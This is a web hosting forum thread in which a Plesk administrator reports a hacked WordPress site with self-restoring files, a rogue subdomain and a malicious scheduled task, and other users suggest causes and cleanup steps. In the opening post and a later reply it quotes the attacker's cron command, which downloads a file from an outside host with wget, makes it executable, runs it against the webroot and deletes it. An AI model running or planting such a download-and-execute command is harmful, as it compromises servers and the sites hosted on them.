Question Wordpress Hacked! Unusual Plesk Behavior

[WebHostingAce]

Server operating system version

CentOS Linux 7.9.2009 (Core)

Plesk version and microupdate number

Version 18.0.45 Update #1

Hi,

One of the Wordpress website is hacked.

The issue -

- Could not delete .htaccess or index.php from httpdocs, As soon as you delete them both files are back. - infected .htaccess and index.php can’t be deleted
- Somehow hacker has managed to create a subdomain in Plesk.
- Run command such as "wget -q -O xxxd http://xxx.xxxx.tld/xxxd && chmod 0755 xxxd && /bin/sh xxxd /var/www/vhosts/xxxx.tld/httpdocs 24 && rm -f xxxd
- Add a Scheduled Task

This Wordpress Service Plan/Subscription with,

- Hosting settings management - Not Enabled
- Common PHP settings management - Not Enabled
- Setup of potentially insecure web scripting options that override provider's policy - Not Enabled
- Scheduler management - Not Enabled
- SSH access to the server shell under the subscription's system user - Not Enabled

I found that hacker uploaded this Panel, I will attach in this post.

Thank you.

 

[Bitpalast]

The attack vector is most likely a malicious PHP script which breaks out of the subscription to create a crontab file in the systems crontab folder. This cronjob then can run shell commands as mentioned in your post. It normally not only runs a single command, but downloads an executable shell file (using wget) and runs that file. This file stays in the Linux process list and remains active. Most of the time I had observed this the purpose was to send spam by bypassing the system's sendmail. You'll need to carefully examine your Linux process list. Very likely there is one process disguised with a name that looks "right" at first sight which is running as the subscription owner. Kill that process.

Your website is infected. You will need to remove the whole website and maybe even other websites in the same subscription because the malware could also reside in them. From my experience at least it is not possible to only remove some files to clean the website from malware. Also ImunifyAV etc. won't succeed with a lasting result either. If the file permissions are not changed by a malicious system process, it is likely that the Wordpress built-in "cron" functionality is used for it. Everytime someone accesses any script, this is hooked to the rendering process and executed. That's why permissions are instantly reset.

To keep the server from blocking access to files:
1) kill the malicious Linux shell process
2) suspend the subscription (or domain)
3) then remove the websites
4) re-activate the subscription
To make sure it cannot happen again: Disable cronjobs option (planned tasks) for that subscription, disable shell for subscription user if not needed.

The root cause is a security vulnerability in a theme or plugin that your website is using. But this can be hard to figure out. Maybe run Google searches against each plugin or them name for known vulnerability, e.g. "vulnerability <plugin name>" and so on. Discontinue using such themes or plugins.

 

[WebHostingAce]

@Peter Debik

Thank you very much for your time!

This really worries me,
---
The attack vector is most likely a malicious PHP script which breaks out of the subscription to create a crontab file in the systems crontab folder.
---

Yes, I found the process then Killed it. Also removed the subscription and restarted the server (In case)

I'm still wondering how did they manage to add a subdomain in Plesk. This remains a mystery.

 

[Bitpalast]

Maybe you don't have SSH chrooted but a normal SSH shell? In that case the attacker could execute a Plesk shell command.

 

[WebHostingAce]

Maybe you don't have SSH chrooted but a normal SSH shell? In that case the attacker could execute a Plesk shell command.

There subscriptions have no SSH at all.

I have attached 2 images.

Thank you!!!

 

[Bitpalast]

I think you should introduce this case to the Plesk security team (via support ticket). Personally I also think that there is a vulnerability and I had filed a case regarding the crontab issue before, but they convinced me that processes can only be run as the subscription user and not escalate to root. However, the subscription user in your case should not be able to create a subdomain, especially not if it does not have shell permissions.

 

[WebHostingAce]

Thank you @Peter Debik

I think I should introduce this case to the Plesk security team (via support ticket).

This customer had a very strong password for Plesk (He was not aware of the password as well, not technical)

Also the subdomain was something like mein.Somethingpostdutch.domainname.tld

I don't think this (Australian) customer would intentionally create this(not English) subdomain anyway which caught my attention.

 

[WebHostingAce]

I've found out this customer username/password may have leaked and used to create this subdomain.

Its still doesn't explain how did the hacker managed to add this Cron Task,

wget -q -O xxxd http://xxx.xxxx.tld/xxxd && chmod 0755 xxxd && /bin/sh xxxd /var/www/vhosts/xxxx.tld/httpdocs 24 && rm -f xxxd

Or

Run a sh command as the subscription's system was a nologin.

Both were disabled in these subcriptions,

- Scheduler management - Not Enabled
- SSH access to the server shell under the subscription's system user - Not Enabled

 

[Maarten]

There are several ways to get a remote shell; even PHP's disable_funtions won't help you.

google: bypass PHP's disable_function

How I bypassed disable_functions in php to get a remote shell

Today I will show you how I was able to bypass disable_functions and get a remote shell that lead me to access most of the users' files.

infosecwriteups.com

 

[WebHostingAce]

@maartenv Thank you! Peter also explained me how this has been done.